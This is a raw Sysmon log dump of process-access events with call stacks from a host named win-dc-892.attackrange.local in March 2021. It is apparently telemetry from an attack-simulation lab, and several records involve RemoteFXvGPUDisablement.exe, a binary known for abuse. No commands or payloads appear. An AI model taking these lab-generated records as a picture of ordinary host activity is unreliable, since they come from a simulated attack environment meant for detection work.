AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.100.etlMD5=3A9083C46E1F63F9A7F1A86BDFC260DC,SHA256=F8A35E45D800A01A55F2B5EE5081DCD8C5D6710D8D9620FEE48D2EFD4838BF54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.903{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.903{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.903{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.903{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.903{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.887{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.871{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.871{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.871{266CAFBE-6521-6064-1901-00000000AE01}63207120C:\Windows\system32\conhost.exe{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.871{266CAFBE-6521-6064-1A01-00000000AE01}52407132C:\Windows\system32\conhost.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1A01-00000000AE01}5240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1901-00000000AE01}6320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1801-00000000AE01}4616C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1501-00000000AE01}6264C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 